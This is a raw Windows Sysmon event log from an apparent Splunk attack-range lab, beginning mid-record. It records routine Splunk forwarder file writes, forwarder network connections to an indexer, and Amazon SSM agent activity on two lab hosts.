Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285041Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:21.057{C8EA50B7-0E25-6216-A404-000000003802}6044C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000214133Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:18.654{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51169-false10.0.1.12-8000- 23542300x8000000000000000285051Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:22.916{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E21137A725CD10A25ACE5483CBEB41DB,SHA256=B5D0FD42E2A22E401EE530685C6F35D3C4F3EAB29DCC668FD29C85F03A684427,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214135Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:22.590{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53A6F56B5FC62B8A72231F69D78DB6D4,SHA256=CE9C12629145644CDE63E0494E1213F8702CC7BA1770012B064AA78E1F83209F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285053Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:23.931{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F413916F92777789BB57382B8962A3E8,SHA256=025B70A97830A2102EB1D1B45F274EBB94431552538A5874B737A266AD687FF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214136Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:23.590{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DCE1EC3C9D534F61749F7EB71F7C13E,SHA256=E2AEDB8426831B1C733242E87AE8A4E2679F6DC008922388F5185008CAB8A6EC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285052Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:20.648{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53222-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285054Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:24.932{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0DE3563C0F21576EDBFB3B67C9F4041,SHA256=89282BE776E68BF0C23534710AB930049B14E51187C20FF07B8A8A080F91D70B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214137Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:24.606{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64922719F254CAF89EFE27DE2D9A7A9A,SHA256=C010508D8D12548C84694D01068F0B631747ED27E177863DE7BB9B8A99F71F3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214138Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:25.622{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B4CE96FA2D97ACB9BC408EB0EEA0A65,SHA256=390C940BFA4961DA6DFA57CBE496B39B46E8316C9AAAF9D08FA96D03CD5B415A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214139Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:26.622{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26385615025BC1F961ED6FCB92A6AA22,SHA256=7C248D32AB80D3BD1D959169F207EEADDBE12DAF16D1B44B8DD1D7E249C75A1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285055Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:26.103{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=954C820D0B4629B575950288C56F3F0E,SHA256=12D2D9F23B1164EED3473D313AEC1EE0AF45B6DFEF8F615656AC555C92FD5FB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214141Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:27.637{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7BE1DCB7D011AF12DD88C4CA92F6F0D,SHA256=62DE3FBFF4D57F748C66148440F32B540406DCC10EF49DC41A793F695AF0B992,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285056Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:27.119{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7BF177936C5F25CA35DB3B6FE729A3B,SHA256=12E75E3A875B5B50A45404D37273A5DB909F035BD39899858035073FE2179911,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214140Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:24.654{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51170-false10.0.1.12-8000- 23542300x8000000000000000214142Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:28.653{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51E0307B67638152E3E4AB320E866C0D,SHA256=8D432508FB2C581A8CBB6F6ABA503998E23176472DBAB543CD536A4B18CD0489,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285058Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:25.721{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53223-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285057Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:28.135{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=590D8F3B84AD7FB0DF2C27FDE8EE6000,SHA256=282E821FC6951836A2DF72B45661B81AA45964FE2D4467BBEA08A4F78F23D7FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214143Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:29.653{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4307972BE59C600E37EFF1FEF00C9600,SHA256=2DBC89918A00BB42F1957F59F5B69CFE7758C787552A42F75E45006846505C85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285059Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:29.150{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5879099E7720A7EC9F670E42601BD061,SHA256=1B262428E4FF28DA13E6EAEF07536B4FDC1528AF2DF458BE9A22106DFFAF1B95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214145Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:30.668{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B476838679D584F35430BD413A35B9A,SHA256=AEF5D055123584C70A317FD7BD6403011FFF25E5C2D62918345033FA37FEFCDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285060Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:30.166{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=304DFC5C5A3A7247432B9BC97F2DF114,SHA256=9AAEDA8B452C2D7D0CA90A8E91CF83B3D5EFB371E2B4F4CB42596A8D2C995F44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214144Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:30.231{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=D0E819179D4D1BAA6C062A31D169E73B,SHA256=82DF7A0874837686007689ED4331538CF761EC0163A0BFD38A7CC854AC58A670,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214146Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:31.684{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DA0FC569E9CD73B4BE5BBA35C7337A7,SHA256=6D187AAC24FD7DF67F1B5C2F0F2A0636E94FC419A97F15AA31FA95885F0655B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285061Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:31.181{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52623E082C1660263873C0E448FA4D64,SHA256=9611D6CEF6B55B5558A4677D1735DD26730FC2C4E5D6C6EE2D6A644FF2A6BDC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214148Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:32.700{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87CB041E1D85ECA2FE5A5B98A98FFCF6,SHA256=09CDC4C3905C5CE2BAE19463A461C853A1D2DD5713E220D8CDED0D18321BA10B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285062Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:32.197{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEFB1817D6B051CB6F843ECA96C1C2CF,SHA256=796DDF9E6D93E7D073F5718F38BB6D5F3CFBA5D6B28E0E97DA14BDF1B871AEAA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214147Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:30.545{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51171-false10.0.1.12-8000- 23542300x8000000000000000214149Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:33.700{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3638D21197FDAE1D67AFA7DBF6777486,SHA256=530C15F98B9E4EC2E3E05C33BF628329E5CCE3C0FCBF87C85265BF826E24908B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285065Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:31.721{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53224-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285064Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:33.244{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=97E8091A3CA3A81AEF94806DA993D5A4,SHA256=B9DFB5F6693D53FC64E479A7A01812B882BE5B2BCAE980C9FC2371A36503905A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285063Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:33.213{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45D01CAB704F8B4C3EC6928DD74A52AA,SHA256=DA957F76FBECBE21556722B478D99F0E8DE4F4576CB014C7BDE0FC6A29951DB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214153Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:34.746{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7087DA270121809448125185ED4D59C9,SHA256=4E8E297AA09FE201FD4E1D813E629EB4572E1E00A8B58460F9ACD24A8E6E40E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214152Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:34.746{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A5EBC485013627209AF4ABCA2CBEA3A1,SHA256=C0D205E42CE0AD4FA32F55DCC52C5DC1DBB6297062F65CCE75C078BAA7CC1295,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214151Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:34.715{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F88588108870E8DC5E0ED84EF9C2EE2,SHA256=F68C37FA10120944A79C75FC94622310114B2D5AD1F662765FC038AEE91C286F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285066Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:34.213{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B48D1B9CF5D41CA4A7C84C084F47D0D8,SHA256=5C938F72B746AA8FBC23627F8D9DCEF6DD1C8C39374250EF2F8242449908690A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214150Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:32.372{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse47.242.107.32-63661-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000214154Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:35.731{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=396FC0BD9239D052E500FCB88AC611A9,SHA256=A68AA1C44D0E2B57BF953F0E7B4B3D151394078B2DD2FA44763BCA9264F26DC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285067Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:35.228{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=835A4301513399F9321101AC87B670A8,SHA256=EC74F9B82F64C7147B109DC314F47D5CC7C34033DE8733AA746B3BBD6EF1F5E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214156Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:36.924{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-120MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214155Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:36.732{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=424ABE0708F5C197B4D0625EC4328E08,SHA256=6BEC62A52530FE542DF65A7DB2F6FDC13CC56660530012E6AE013A755F8F8043,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285068Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:36.260{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B93144685E1F63F664626BCCF35B8B33,SHA256=1FE47487A1D14862520AD96944A6F1AC091BE66CBD80D00D1C07B6B108CD37DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214158Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:37.922{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-121MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214157Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:37.734{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EA730966AF7BC4BFB802B47AD383298,SHA256=89A61A4E4703E35A00764F514D3817312A1EC681D6C8A50BA1632FE27E3E0358,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285069Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:37.306{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7C9FF44208592B200F3AAED4FAA04B6,SHA256=16DB5DC96F8D9A5EB3A5389E6256CAAD3AE4A6EA99F483DF1BAB81AA6E069ABC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214160Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:38.748{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D41D42955C388D8925B81FAC7CBD31BF,SHA256=63C8ED574A8FD7903B99C1535EFFA2FC11DF4F666B53E486D793AA5F1CED14A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285070Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:38.353{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76865FD5357A4649F5224667BF91B1DD,SHA256=E8C346DF3EB44F552CDC11B7DE6F9A470F016014492ADAC1DBC4DD94FDB43FCC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214159Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:36.563{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51172-false10.0.1.12-8000- 23542300x8000000000000000214161Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:39.779{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F399115A05719B53571E829BA38A4A3F,SHA256=D5241049C43D422E1C389B801F7392377139C1B0DE9BF9AC46FD551AA900283F,IMPHASH=00000000000000000000000000000000falsetrue 